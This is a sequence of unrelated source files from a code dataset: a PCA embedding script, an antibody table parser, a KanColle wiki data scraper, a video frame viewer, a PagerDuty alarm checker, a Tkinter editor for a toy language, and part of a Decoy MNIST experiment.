batch_size=100, shuffle=False\r\n)\r\ntest_loader = torch.utils.data.DataLoader(\r\n dataset=test_data, batch_size=100, shuffle=False\r\n)\r\n\r\ntotal_right = 0\r\ntotal_samples = 0\r\nX = None\r\nfor i, (data, labels) in enumerate(train_loader):\r\n data = data.cuda()\r\n labels = labels.cuda()\r\n embedding = model.get_embedding(data).detach()\r\n if X is None:\r\n X = embedding\r\n else:\r\n X = torch.cat([X, embedding], dim=0)\r\n output = model(data)\r\n output = torch.argmax(output, dim=-1)\r\n total_right += torch.sum(output == labels)\r\n total_samples += len(labels)\r\nprint(f\"training, {total_right}/{total_samples}=\", float(total_right) / total_samples)\r\n\r\ntotal_right = 0\r\ntotal_samples = 0\r\nfor i, (data, labels) in enumerate(test_loader):\r\n data = data.cuda()\r\n labels = labels.cuda()\r\n embedding = model.get_embedding(data).detach()\r\n if X is None:\r\n X = embedding\r\n else:\r\n X = torch.cat([X, embedding], dim=0)\r\n output = model(data)\r\n output = torch.argmax(output, dim=-1)\r\n total_right += torch.sum(output == labels)\r\n total_samples += len(labels)\r\nprint(f\"testing, {total_right}/{total_samples}=\", float(total_right) / total_samples)\r\n\r\nX = X.detach().cpu().numpy()\r\nprint(X.shape)\r\n\r\npca = PCA(n_components=256)\r\nnewX = pca.fit_transform(X)\r\nprint(newX.shape)\r\n\r\nnp.save(\"newX\", newX)\r\n","sub_path":"cifar10/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":4867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"321756115","text":"# this will parse the output table, containing GERMline, CDR, DNA information of individual reads\nimport os\nimport IsolateClone\n\ndef ParseTable(filePath):\n\tAbDict={}\n\tkeyList=['RID','LID','DNAlen','FV-PRO','FV-DNA',\"GERMLINE-V\",'GERMLINE-D','GERMLINE-J','FR1-PRO','CDR1-PRO','FR2-PRO','CDR2-PRO',\"FR3-PRO\",'CDR3-PRO','FR4-PRO','PRO',\"DNA\",'FR1-PRO','CDR1-DNA','FR2-PRO','CDR2-DNA','FR3-DNA','CDR3-DNA','FR4-DNA','FR4-DNA']\n\n\t#print \"how many key? 
\" + str(len(keyList))\n\tcount_seq=0\n\tfor filename in os.listdir(filePath):\n\t\tif not filename.endswith(\"all.xls\"):\n\t\t\tcontinue\n\t\tcurrentFile=os.path.join(filePath,filename)\n\t\twith open (currentFile) as tableObject:\n\t\t\tfor line in tableObject:\t\n\t\t\t\tif line.startswith(\"#\"):\n\t\t\t\t\tcontinue\n\t\t\t\tcount_seq +=1\n\t\t\t\tline=line.rstrip(\"\\n\")\n\t\t\t\titem=line.split(\"\\t\")\n\n\t\t\t\t#print \"how many item?\" + str(len(item))\n\t\t\t\tAbDict[item[0]]={}\n\t\t\t\t#print item\n\t\t\t\tfor i in range(0,len(keyList)):\n\t\t\t\t\t#print AbDict[item[0]]\n\t\t\t\t\t#print keyList[i]\n\t\t\t\t\t#print item[i]\n\t\t\t\t\ttry:\n\t\t\t\t\t\tAbDict[item[0]].update({keyList[i]:item[i+1]})\n\t\t\t\t\texcept:\n\t\t\t\t\t\tAbDict[item[0]].update({keyList[i]:\"\"})\n\t\t\t\tAbDict[item[0]][\"DNA\"] = AbDict[item[0]][\"DNA\"]\n\treturn (AbDict,count_seq)\t\t\t\t\t\t\t\n\n##################\n'''\nfile=\"/dlab/NGS/usem-seqanalysis/160314_zhaiqi1_miseq_HBx52-60DNA.20160214_AN2N4/test/RESULTS\"\nAbDict=ParseTable(file)\ngroup = IsolateClone.identifyClone(AbDict)\n#print group\n#print \"Unique comibnation:\" + str(len(group))\n#print \"nubmer of individiual\" + str(len(AbDict))\n#print AbDict\n'''\n","sub_path":"ParseTable.py","file_name":"ParseTable.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"404747281","text":"import asyncio\nimport json\nimport re\n\nfrom config import (DB_PATH, JSON_PATH, KCDATA_SHIP_ALL_JSON,\n KCDATA_SLOTITEM_ALL_JSON, LUATABLE_PATH, OUPUT_PATH,\n SHINKAI_EXTRA_JSON, SHINKAI_ITEMS_DATA, SHINKAI_SHIPS_DATA,\n WIKIA_OUTPUT_JSON)\nfrom HttpClient import HttpClient\nfrom slpp import slpp as lua\nfrom utils import jsonFile2dic, luatable, sortDict\n\nLUATABLE_PATTERN = re.compile(r'{[\\s\\S]*}')\nREDIRECT_PATTERN = re.compile(r'\\[\\[(.*)\\]\\]')\n\nRANGE = {\n 0: '无', 1: '短', 2: '中', 3: '长', 4: '超长', 5: '超超长', -1: '未知'\n}\nSPEED = {\n 0: '陆上单位', 5: '低速', 10: '高速', -1: '未知'\n}\n\nATTRS = {\n '_can_debuff': '削甲'\n}\n\nSTATS = {\n '_luck': '运', '_shelling_accuracy': '命中',\n '_bombing': '爆装', '_torpedo': '雷装', '_hp': '耐久',\n '_armor': '装甲', '_aa': '对空', '_asw': '对潜',\n '_los': '索敌', '_speed': '速力', '_evasion': '回避',\n '_firepower': '火力', '_range': '射程',\n '_torpedo_accuracy': '雷击命中'\n}\nSTATS_EXTRA = {\n '_opening_torpedo': '开幕鱼雷',\n '_slots': '格数',\n '_night_bombing': '夜战轰炸',\n '_air_power': '制空值',\n '_asw_attack': '开幕反潜'\n}\nREMARKS = {\n 560: '可提供夜战连击'\n}\n\nREDIRECT = {\n '22inch Torpedo Late Model': 'High-speed Abyssal Torpedo'\n}\nSTYPE = {\n 1: '海防舰', 2: '驱逐舰', 3: '轻巡洋舰', 4: '重雷装巡洋舰', 5: '重巡洋舰',\n 6: '航空巡洋舰', 7: '轻空母', 8: '战舰', 9: '战舰', 10: '航空战舰',\n 11: '正规空母', 12: '超弩级战舰', 13: '潜水艇', 14: '潜水空母', 15: '输送舰',\n 16: '水上机母舰', 17: '扬陆舰', 18: '装甲空母', 19: '工作舰', 20: '潜水母舰',\n 21: '练习巡洋舰', 22: '补给舰'\n}\n\nSKIP_SUFFIXES = ['New Year 2017']\n\n\nclass ShinkaiLuatable(HttpClient):\n WIKIA_RAW_URL = 'http://kancolle.wikia.com/wiki/{}?action=raw'\n\n def __init__(self):\n super().__init__()\n self.items_id_map = {}\n self.items_data = {}\n self.ships_data = {}\n self.SHINKAI_EXTRA = {}\n self.SLOTITEMS_KCDATA = jsonFile2dic(DB_PATH + KCDATA_SLOTITEM_ALL_JSON, masterKey='id')\n self.SHIPS_KCDATA = jsonFile2dic(DB_PATH + KCDATA_SHIP_ALL_JSON, masterKey='id')\n\n async def __get_allitems(self):\n SHINKAI_ITEMS_URL = 'http://kancolle.wikia.com/api.php?action=query&list=categorymembers&cmtitle=Category:Enemy_equipment&cmlimit=500&format=json'\n async with 
self.session.get(SHINKAI_ITEMS_URL) as resp:\n res = await resp.json()\n return res['query']['categorymembers']\n\n async def __append_shinkai_item(self, title):\n resp = await self.session.get(self.WIKIA_RAW_URL.format('Module:' + title))\n item_info_text = await resp.text()\n while item_info_text.find('REDIRECT') != -1:\n title = REDIRECT_PATTERN.search(item_info_text).group(1).strip()\n resp = await self.session.get(self.WIKIA_RAW_URL.format('Module:' + title))\n item_info_text = await resp.text()\n _luatable = re.search(LUATABLE_PATTERN, item_info_text)\n if not _luatable:\n return\n _luatable = _luatable.group(0)\n item_info = lua.decode(_luatable)\n item_id = item_info['_id']\n chinese_name = self.SLOTITEMS_KCDATA[item_id]['chinese_name']\n chinese_name = chinese_name if chinese_name else ''\n self.items_data[item_id] = {\n '日文名': item_info['_japanese_name'],\n '中文名': chinese_name,\n '类型': self.SLOTITEMS_KCDATA[item_id]['type'],\n '稀有度': item_info['_rarity']\n }\n self.items_id_map[item_info['_name']] = item_id\n for key, val in item_info.items():\n if key not in STATS:\n continue\n if val == False:\n continue\n if key == '_range':\n val = RANGE[val]\n self.items_data[item_id].update({\n STATS[key]: val\n })\n if item_id in REMARKS:\n self.items_data[item_id].update({\n '备注': REMARKS[item_id]\n })\n\n async def genShinkaiItems(self):\n CATEGORY_MEMBERS = await self.__get_allitems()\n tasks = []\n for category in CATEGORY_MEMBERS:\n title = category['title']\n if title.startswith('Template'):\n continue\n tasks.append(asyncio.ensure_future(\n self.__append_shinkai_item(title)))\n dones, pendings = await asyncio.wait(tasks)\n print('Shinkai-Items: {} done, {} pendings.'.format(len(dones), len(pendings)))\n self.items_data = sortDict(self.items_data)\n items_luatable = 'local d = {}\\n'\n items_luatable += '\\nd.equipDataTable = '\n items_luatable += luatable(self.items_data)\n items_luatable += '\\n'\n items_luatable += '\\nreturn d\\n'\n with open(OUPUT_PATH + LUATABLE_PATH + SHINKAI_ITEMS_DATA + '.lua', 'w', encoding='utf-8') as fp:\n fp.write(items_luatable)\n with open(OUPUT_PATH + JSON_PATH + SHINKAI_ITEMS_DATA + '.json', 'w', encoding='utf-8') as fp:\n json.dump(self.items_data, fp, ensure_ascii=False, indent=4)\n\n async def __get_allships(self):\n ret = []\n async with self.session.get('http://kancolle.wikia.com/api.php?action=query&list=categorymembers&cmtitle=Category:Enemy_ship_modules&cmlimit=500&format=json') as resp:\n res = await resp.json()\n CATEGORY_MEMBERS = res['query']['categorymembers']\n for category in CATEGORY_MEMBERS:\n title = category['title']\n if title.startswith('Module') and title not in ret:\n ret.append(title)\n async with self.session.get('http://kancolle.wikia.com/api.php?action=query&list=categorymembers&cmtitle=Category:Enemy_boss_ship_modules&cmlimit=500&format=json') as resp:\n res = await resp.json()\n CATEGORY_MEMBERS = res['query']['categorymembers']\n for category in CATEGORY_MEMBERS:\n title = category['title']\n if title.startswith('Module') and title not in ret:\n ret.append(title)\n return ret\n\n def __load_extra(self):\n self.SHINKAI_EXTRA = jsonFile2dic(DB_PATH + SHINKAI_EXTRA_JSON)\n wikia_data = jsonFile2dic(DB_PATH + WIKIA_OUTPUT_JSON)\n for _id, value in wikia_data.items():\n if _id not in self.SHINKAI_EXTRA:\n self.SHINKAI_EXTRA[_id] = {}\n self.SHINKAI_EXTRA[_id].update(value)\n\n async def __append_shinkai_ship(self, title):\n resp = await self.session.get(self.WIKIA_RAW_URL.format(title))\n resp_text = await resp.text()\n 
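# Unlike __append_shinkai_item above, the match below is used without a\n        # None check, so a page with no Lua table would raise AttributeError on\n        # .group(0). A defensive variant could bail out early, e.g.:\n        #   if LUATABLE_PATTERN.search(resp_text) is None:\n        #       return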
_luatable = LUATABLE_PATTERN.search(resp_text)\n _luatable = _luatable.group(0)\n shinkai_infos = lua.decode(_luatable)\n for shinkai_info in shinkai_infos.values():\n if type(shinkai_info) is not dict:\n continue\n if '_api_id' not in shinkai_info:\n continue\n if '_suffix' in shinkai_info and shinkai_info['_suffix'] in SKIP_SUFFIXES:\n continue\n api_id = shinkai_info['_api_id']\n if api_id < 1000:\n api_id += 1000\n if api_id not in self.SHIPS_KCDATA:\n continue\n _api_id = str(api_id)\n extra_data = self.SHINKAI_EXTRA[_api_id] if _api_id in self.SHINKAI_EXTRA else {\n }\n yomi = self.SHIPS_KCDATA[api_id]['yomi']\n yomi = yomi if yomi else ''\n chinese_name = self.SHIPS_KCDATA[api_id]['chinese_name']\n chinese_name = chinese_name if chinese_name else ''\n category = ''\n stype = self.SHIPS_KCDATA[api_id]['stype']\n if 'Stype' in extra_data:\n category = extra_data['Stype']\n else:\n category = STYPE[stype]\n self.ships_data[_api_id] = {\n '日文名': shinkai_info['_japanese_name'],\n '中文名': chinese_name,\n 'kcwiki分类': category,\n '属性': {\n '耐久': 0,\n '装甲': 0,\n '火力': 0,\n '雷装': 0,\n '对潜': 0,\n '对空': 0,\n '回避': 0,\n '索敌': 0,\n '运': 0,\n '速力': \"未知\",\n '射程': \"未知\"\n },\n '装备': {}\n }\n for key, val in shinkai_info.items():\n if key == '_id' or key == '_api_id':\n continue\n if val == None or val == 0:\n continue\n if key == '_range':\n val = RANGE[val]\n elif key == '_speed':\n val = SPEED[val]\n elif key == '_equipment':\n equips = {\n '格数': len(val),\n '搭载': [],\n '装备': []\n }\n for att in val:\n equips['搭载'].append(att['size'] if att['size'] else 0)\n equip_name = att['equipment']\n equip_id = -1\n if equip_name and equip_name not in self.items_id_map:\n if equip_name in REDIRECT:\n equip_name = REDIRECT[equip_name]\n if equip_name and equip_name in self.items_id_map:\n equip_id = self.items_id_map[equip_name]\n equips['装备'].append(equip_id)\n self.ships_data[_api_id].update({\n '装备': equips\n })\n elif val == True:\n val = 1\n elif val == False:\n val = 0\n if key in STATS:\n if key == '_firepower' and\\\n (chinese_name.find('WO') != -1 or chinese_name.find('NU') != -1) and\\\n 'DayBattle' in extra_data:\n val = [val, extra_data['DayBattle']]\n self.ships_data[_api_id]['属性'][STATS[key]] = val\n elif key in ATTRS:\n self.ships_data[_api_id].update({\n ATTRS[key]: val\n })\n if (chinese_name.find('WO') != -1 or chinese_name.find('NU') != -1) and\\\n 'DayBattle' in extra_data:\n if '火力' not in self.ships_data[_api_id]['属性']:\n self.ships_data[_api_id]['属性']['火力'] = [0, extra_data['DayBattle']]\n\n async def genShinkaiShips(self):\n self.__load_extra()\n categories = await self.__get_allships()\n tasks = []\n for title in categories:\n tasks.append(asyncio.ensure_future(\n self.__append_shinkai_ship(title)))\n dones, pendings = await asyncio.wait(tasks)\n print('Shinkai-Ships: {} done, {} pendings.'.format(len(dones), len(pendings)))\n self.ships_data = sortDict(self.ships_data)\n ships_luatable = 'local d = {}\\n'\n ships_luatable += '\\nd.shipDataTable = '\n ships_luatable += luatable(self.ships_data)\n ships_luatable += '\\n'\n ships_luatable += '\\nreturn d\\n'\n with open(OUPUT_PATH + LUATABLE_PATH + SHINKAI_SHIPS_DATA + '.lua', 'w', encoding='utf-8') as fp:\n fp.write(ships_luatable)\n with open(OUPUT_PATH + JSON_PATH + SHINKAI_SHIPS_DATA + '.json', 'w', encoding='utf-8') as fp:\n json.dump(self.ships_data, fp, ensure_ascii=False, indent=4)\n\n async def start(self):\n await self.genShinkaiItems()\n await 
self.genShinkaiShips()\n","sub_path":"ShinkaiLuatable.py","file_name":"ShinkaiLuatable.py","file_ext":"py","file_size_in_byte":12018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"256749382","text":"import cv2\nimport numpy as np\n\ncap = cv2.VideoCapture('line_latest1.mp4')\ncounter = 0\nif (cap.isOpened()== False): \n print(\"Error opening video stream or file\")\n\nwhile cap.isOpened():\n ret, frame = cap.read()\n if ret == True:\n cv2.imshow('Frame',frame)\n \n if cv2.waitKey(0) & 0xFF == ord('q'):\n cv2.imwrite(\"defective frame.jpg\", frame)\n break\n counter += 1\n print(counter)\n else:\n break\n \n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"play_video.py","file_name":"play_video.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"71753975","text":"'''\n\n pyger.py\n Core script, checks on pagerduty and fires the alarms if necessary.\n\n'''\n\n__Author__ = 'Chris Swanson'\n\n\nimport alarms\nimport pygerduty\nimport ConfigParser\n\n\nclass Pager(object):\n '''Pagerduty class to check for paged status.'''\n def __init__(self):\n '''Initialization function'''\n # Import configs.\n self.import_conf()\n self.pager = pygerduty.PagerDuty(self.subdomain, self.apikey)\n\n def import_conf(self):\n '''Import Configurations for Pagerduty.'''\n configs = ConfigParser.ConfigParser()\n configs.read('config.ini')\n # Pagerdutt API Key\n self.apikey = configs.get('pagerduty', 'apikey')\n # Pagerduty subdomain\n self.subdomain = configs.get('pagerduty', 'subdomain')\n # Email of user, used for validating the alarm is for you...\n self.email = configs.get('pagerduty', 'email')\n # Heartbeat / how often to hit the pagerduty API.\n self.heartbeat = int(configs.get('pagerduty', 'heartbeat'))\n\n def is_paged(self):\n '''Check PagerDuty for status.'''\n pages = self.pager.incidents.list()\n for page in pages:\n email_addr = page.to_json()['assigned_to_user']['email']\n if email_addr.lower() == self.email.lower():\n alarms.run()\n\n\ndef main():\n '''Main function.'''\n check = Pager()\n check.is_paged()\n\nif __name__ == '__main__':\n main()\n","sub_path":"pyger.py","file_name":"pyger.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"458617002","text":"from Tkinter import *\nimport tkMessageBox\nimport time\nimport tkFileDialog\nimport os\nimport subprocess\nimport Husky_Interpreter\nfrom sys import *\n\nclass GUI(Tk):\n\tdef __init__(self, parent):\n\t\tTk.__init__(self, parent)\n\t\tself.parent=parent\n\t\tself.fclipboard=0\n\tdef mainGUI(self):\n\t\tself.geometry('1265x701+5-46')\n\t\tself.resizable(False, False)\n\t\tself.title('Husky Editor')\n\t\tself.configure(background='#2a2a2a')\n\t\tself.logo=PhotoImage(file='Husky_Logo.gif')\n\t\tself.tk.call('wm', 'iconphoto', self._w, self.logo)\n\n\t\tself.menubar=Menu(self)\n\t\tself.file=Menu(self.menubar, tearoff=0)\n\t\tself.file.add_command(label='New', command=self.newfile)\n\t\tself.file.add_command(label='Open', command=self.openfile)\n\t\tself.file.add_command(label='Save As', command=self.saveas)\n\t\tself.file.add_command(label='Save', command=self.savefile)\n\t\tself.file.add_command(label='Close', command=self.destroy)\n\t\tself.menubar.add_cascade(label='File', menu=self.file)\n\n\t\tself.edit=Menu(self.menubar, tearoff=0)\n\t\tself.edit.add_command(label='Cut', 
command=self.cuttext)\n\t\tself.edit.add_command(label='Copy', command=self.copytext)\n\t\tself.edit.add_command(label='Paste', command=self.pastetext)\n\t\tself.edit.add_command(label='Comment', command=self.comment)\n\t\tself.menubar.add_cascade(label='Edit', menu=self.edit)\n\n\t\tself.tools=Menu(self.menubar, tearoff=0)\n\t\tself.tools.add_command(label='Compile and Run', command=self.compilerun) #Save contents of current file and compile+run\n\t\tself.menubar.add_cascade(label='Tools', menu=self.tools)\n\n\t\tself.config(menu=self.menubar)\n\n\t\tself.texteditor=Text(self, width=87, height=48, font=('Lucida Console', '8'), bg='#272822', fg='white', insertbackground='white', spacing3=3, selectbackground='#49483e', wrap=NONE, padx=10, pady=5, tabs=25)\n\t\tself.texteditor.place(relx=0, rely=0)\n\t\tself.texteditor.bind(\"<KeyRelease>\", lambda event:self.position())\n\n\t\tself.lclabel=StringVar()\n\t\tself.linecolumn=Label(self, textvariable=self.lclabel, anchor=W, bg='#575757', fg='white', width=190, relief=FLAT)\n\t\tself.linecolumn.place(relx=0, rely=0.97)\n\n\t\tself.consoleframe=Frame(self, width=615, height=679)\n\t\tself.consoleframe.place(relx=0.499, rely=0)\n\n\t\tself.canvasforthescrollbar=Canvas(self.consoleframe, bg='#e6e6e6', width=615, height=679, highlightthickness=0, highlightbackground='black')\n\t\tself.showconsoleframe=Frame(self.canvasforthescrollbar)\n\t\tconsolescrollbar=Scrollbar(self.consoleframe, orient='vertical', command=self.canvasforthescrollbar.yview)\n\t\tself.canvasforthescrollbar.configure(yscrollcommand=consolescrollbar.set)\n\t\t\n\t\tconsolescrollbar.pack(side='right', fill='y')\n\t\tself.canvasforthescrollbar.pack(side='left')\n\t\tself.canvasforthescrollbar.create_window((0,0), window=self.showconsoleframe, anchor='nw')\n\t\tself.showconsoleframe.bind('<Configure>', self.enablescrollconsole)\n\n\t\tself.startcommand()\n\tdef enablescrollconsole(self, event):\n\t\tself.canvasforthescrollbar.configure(scrollregion=self.canvasforthescrollbar.bbox('all'), width=615, height=679)\n\tdef printcommands(self, com):\n\t\tself.commandframe=Frame(self.showconsoleframe, bg='#e6e6e6')\n\t\tself.commandframe.pack()\n\t\tself.eachcom=Frame(self.commandframe)\n\t\tself.eachcom.pack(padx=8, pady=2)\n\t\tself.comnamelabel=Label(self.eachcom, text=com, fg='#575757', bg='#e6e6e6', font=('Lucida Console', '8'), width=85, anchor=W, justify=LEFT, wraplength=605)\n\t\tself.comnamelabel.pack()\n\tdef scancommand(self):\n\t\tself.scancommandframe=Frame(self.showconsoleframe, bg='#e6e6e6')\n\t\tself.scancommandframe.pack()\n\t\tself.eachscom=Frame(self.scancommandframe)\n\t\tself.eachscom.pack(padx=8, pady=2)\n\t\tself.scanVar=StringVar()\n\t\tself.comnametext=Entry(self.eachscom, textvariable=self.scanVar, fg='#e6e6e6', bg='#575757', font=('Lucida Console', '8'), width=85, insertbackground='white')\n\t\tself.comnametext.pack()\n\t\tself.comnametext.bind(\"<Return>\", self.returninput)\n\tdef returninput(self, event):\n\t\tself.comnametext.configure(state=DISABLED)\n\t\treturn self.scanVar.get()\n\tdef startcommand(self):\n\t\topening='Husky Console (Version 1.1)\nCopyright (c) 2015 Brillantes Chua Esguerra Ongoco Torres.
All rights reserved.'\n\t\tself.commandframe=Frame(self.showconsoleframe, bg='#e6e6e6')\n\t\tself.commandframe.pack()\n\t\tself.eachcom=Frame(self.commandframe)\n\t\tself.eachcom.pack(padx=8, pady=2)\n\t\tself.comnamelabel=Label(self.eachcom, text=opening, fg='#575757', bg='#e6e6e6', font=('Lucida Console', '8'), width=85, anchor=W, justify=LEFT, wraplength=605)\n\t\tself.comnamelabel.pack()\n\tdef saveas(self):\n\t\tself.fclipboard=tkFileDialog.asksaveasfile(mode='w', defaultextension='.hsk')\n\t\tif self.fclipboard is None:\n\t\t\tself.fclipboard=0\n\t\t\treturn\n\t\ttexttosave=self.texteditor.get(1.0, END)\n\t\tself.fclipboard.write(texttosave)\n\t\tself.title('Husky Editor - '+self.fclipboard.name)\n\tdef savefile(self):\n\t\tif(self.fclipboard!=0):\n\t\t\tself.fclipboard=open(str(self.fclipboard.name), 'w')\n\t\t\ttexttosave=self.texteditor.get(1.0, END)\n\t\t\tself.fclipboard.write(texttosave)\n\t\t\tself.title('Husky Editor - '+self.fclipboard.name)\n\t\telse:\n\t\t\tself.saveas()\n\tdef openfile(self):\n\t\tself.fclipboard=tkFileDialog.askopenfile(mode='r')\n\t\tif self.fclipboard is None:\n\t\t\tself.clipboard=0\n\t\t\treturn\n\t\tself.texteditor.delete(1.0, END)\n\t\tfor line in self.fclipboard:\n\t\t\tself.texteditor.insert('insert', line)\n\t\tself.title('Husky Editor - '+self.fclipboard.name)\n\tdef newfile(self):\n\t\tself.fclipboard=0\n\t\tself.texteditor.delete(1.0, END)\n\t\tself.title('Husky Editor')\n\tdef copytext(self):\n\t\ttry:\n\t\t\ttexttocopy=self.texteditor.get('sel.first', 'sel.last')\n\t\t\tself.clipboard_clear() \n\t\t\tself.clipboard_append(texttocopy)\n\t\texcept TclError:\n\t\t\ttkMessageBox.showerror('Copy Error', 'Highlight text to copy.')\n\tdef cuttext(self):\n\t\ttry:\n\t\t\ttexttocut=self.texteditor.get('sel.first', 'sel.last') \n\t\t\tself.texteditor.delete('sel.first', 'sel.last') \n\t\t\tself.clipboard_clear() \n\t\t\tself.clipboard_append(texttocut)\n\t\texcept TclError:\n\t\t\ttkMessageBox.showerror('Cut Error', 'Highlight text to cut.') \n\tdef pastetext(self):\n\t\ttexttopaste=self.selection_get(selection='CLIPBOARD')\n\t\tself.texteditor.insert('insert', texttopaste)\n\tdef comment(self):\n\t\ttry:\n\t\t\tfirst=self.texteditor.index('sel.first').split('.')\n\t\t\tlast=self.texteditor.index('sel.last').split('.')\n\t\t\tif(int(first[0])==int(last[0])):\n\t\t\t\tself.texteditor.insert('sel.first', ';')\n\t\t\telse:\n\t\t\t\tfor i in range(int(first[0]), int(last[0])+1):\n\t\t\t\t\tif(i==int(first[0])):\n\t\t\t\t\t\tindex=str(i)+'.'+str(first[1])\n\t\t\t\t\telse:\n\t\t\t\t\t\tindex=str(i)+'.0'\n\t\t\t\t\tself.texteditor.insert(index, ';')\n\t\texcept TclError:\n\t\t\ttkMessageBox.showerror('Comment Error', 'Highlight text to comment or just type \\';\\' to begin comment.')\n\tdef position(self):\n\t\tline=self.texteditor.index('insert').split('.')\n\t\tstring=\"Line: \"+str(line[0])+\", \"+\"Column: \"+str(int(line[1])+1)\n\t\tself.lclabel.set(string)\n\tdef compilerun(self):\n\t\tif(self.fclipboard!=0):\n\t\t\tself.fclipboard=open(str(self.fclipboard.name), 'w')\n\t\t\ttexttosave=self.texteditor.get(1.0, END)\n\t\t\tself.fclipboard.write(texttosave)\n\t\t\tself.fclipboard.close()\n\t\t\tif(self.fclipboard.name.find(\" \")!=-1):\n\t\t\t\tself.name=self.fclipboard.name[:self.fclipboard.name.find(\" \")]+\"\\\" \\\"\"+self.fclipboard.name[(self.fclipboard.name.find(\" \")+1):]\n\t\t\telse:\n\t\t\t\tself.name=self.fclipboard.name\n\t\t\tcompilestring=\"python Husky_MP.py \"+str(self.name)\n\t\t\tos.system(compilestring)\n\t\t\t#self.a = 
os.popen(compilestring).read()\r\n\t\telse:\r\n\t\t\ttkMessageBox.showerror('Compile Error','Save your file first before compiling.')\r\n\tdef return_filename(self):\r\n\t\treturn self.name\r\n\t#def return_string(self):\r\n\t#\tself.printcommands(self.a)\r\n\t#\treturn self.a \ng=GUI(None)\ng.mainGUI()\ng.mainloop()","sub_path":"Husky_GUI.py","file_name":"Husky_GUI.py","file_ext":"py","file_size_in_byte":7614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"606080971","text":"from __future__ import absolute_import\nfrom __future__ import print_function\n\ntry:\n    from io import BytesIO\nexcept ImportError:\n    import cStringIO\n\nimport array\nimport base64\nimport gzip\nimport json\nimport os\nimport pickle\nimport random\nimport struct\nimport time\n\nfrom celery import Celery\n\nfrom PIL import Image\n\nimport autograd.numpy as np\nimport autograd.numpy.random as npr\n\nimport matplotlib.pyplot as plt\n\ntry:\n    from urllib.request import urlretrieve\nexcept ImportError:\n    from urllib2 import urlopen\n\nfrom lime import lime_image\nfrom skimage.segmentation import mark_boundaries\n\nfrom rfft.experiment import Dataset\nfrom rfft.experiment import Experiment\nfrom rfft.experiment import ExperimentType\n\nfrom rfft.hypothesis import Hypothesis\nfrom rfft.multilayer_perceptron import MultilayerPerceptron\nfrom rfft.local_linear_explanation import explanation_grid\n\n\nANNOTATIONS_DIR = 'tagging/decoy_mnist'\n\n\nclass DecoyMNIST(Experiment):\n\n    MODELS_DIR = 'models/decoy_mnist'\n    SAVED_EXPERIMENTS_CACHE_FILE = 'saved_experiments_metadata'\n\n    def __init__(self):\n        Experiment.__init__(self)\n        self.annotation_idxs = []\n\n    def get_status(self):\n        return self.status\n\n    def domain(self):\n        return ExperimentType.IMAGE\n\n    def pretty_name(self):\n        return 'Decoy MNIST'\n\n    def description(self):\n        return 'Handwritten digits'\n\n    def generate_dataset(self, cachefile='data/decoy-mnist.npz'):\n        if cachefile and os.path.exists(cachefile):\n            cache = np.load(cachefile)\n            data = tuple([cache[f] for f in sorted(cache.files)])\n        else:\n            data = self._generate_dataset(os.path.dirname(cachefile))\n            if cachefile:\n                np.savez(cachefile, *data)\n        self.Xr, self.X, self.y, self.E, self.Xtr, self.Xt, self.yt, self.Et = data\n        self.status.initialized = True\n\n    def get_sample(self, dataset, idx):\n        if not self.status.initialized:\n            raise AttributeError('Generate dataset before fetching samples.')\n        if dataset == Dataset.TRAIN:\n            return self.Xr[idx]\n        elif dataset == Dataset.TEST:\n            return self.Xtr[idx]\n\n    def load_annotations(self, **hypothesis_params):\n        num_annotations = hypothesis_params.pop('num_annotations', None)\n        hypothesis_weight = hypothesis_params.pop('hypothesis_weight', 0)\n        annotation_files = [os.path.join(ANNOTATIONS_DIR, x)\n                            for x in os.listdir(ANNOTATIONS_DIR)\n                            if x.endswith('.npy')][:num_annotations]\n\n        A = np.zeros(self.X.shape).astype(bool)\n        affected_indices = []\n        for f in annotation_files:\n            try:\n                index = int(f.split('/')[-1].split('.')[0])\n                mask = np.load(f)\n                affected_indices.append(index)\n                A[index] = mask\n            except:\n                continue\n\n        self.affected_indices = affected_indices\n        self.hypothesis = Hypothesis(\n            A, weight=hypothesis_weight)\n        self.status.annotations_loaded = True\n\n    def unload_annotations(self):\n        self.hypothesis = None\n        self.status.annotations_loaded = False\n\n    def set_annotation(self, idx, mask):\n        mask = np.array(mask)\n        if idx < len(self.annotation_idxs):\n            annotation_idx = self.annotation_idxs[idx]\n            print('Saving 
{}'.format(annotation_idx))\n np.save(os.path.join(ANNOTATIONS_DIR, str(annotation_idx)), mask)\n else:\n raise IndexError(\n 'idx must be less than the current number of annotations')\n\n def _get_mask_from_idx(self, idx):\n print('Loading {}'.format(idx))\n annotation_path = os.path.join(ANNOTATIONS_DIR, str(idx) + '.npy')\n if os.path.exists(annotation_path):\n return np.load(annotation_path).tolist()\n return None\n\n def _convert_image_to_base64(self, image):\n try:\n buffered = BytesIO()\n except:\n buffered = cStringIO.StringIO()\n image.save(buffered, format='PNG')\n return base64.b64encode(buffered.getvalue()).decode('utf-8')\n\n def get_annotation(self, idx):\n if idx < len(self.annotation_idxs):\n annotation_idx = self.annotation_idxs[idx]\n image = self.get_image(self.X[annotation_idx])\n mask = self._get_mask_from_idx(annotation_idx)\n elif idx == len(self.annotation_idxs):\n while True:\n annotation_idx = random.randint(0, len(self.X) - 1)\n if annotation_idx in self.annotation_idxs:\n continue\n self.annotation_idxs.append(annotation_idx)\n image = self.get_image(self.X[annotation_idx])\n mask = []\n break\n else:\n raise IndexError(\n 'idx must be less than or equal to the current number of annotations')\n return {\n 'annotation_idx': idx,\n 'data': 'data:image/png;base64,' + self._convert_image_to_base64(image),\n 'mask': mask\n }\n\n def delete_annotation(self, idx):\n if idx < len(self.annotation_idxs):\n annotation_idx = self.annotation_idxs[idx]\n annotation_path = os.path.join(\n ANNOTATIONS_DIR, str(annotation_idx) + '.npy')\n try:\n os.remove(annotation_path)\n except IOError:\n pass\n else:\n raise IndexError(\n 'idx must be less than the current number of annotations')\n\n def train(self, num_epochs=6):\n self.model = MultilayerPerceptron()\n 